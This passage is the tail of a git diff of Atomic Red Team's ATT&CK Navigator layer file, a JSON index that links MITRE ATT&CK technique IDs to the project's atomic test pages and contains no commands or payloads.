T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.0
01/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","s
core":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://git
hub.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team
/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/
T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomi
cs/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,
"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,
"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":10
0,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T154
7","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techn
iqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"
techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md
"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.0
01.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.
md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
index e607a440..1530a1d7 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
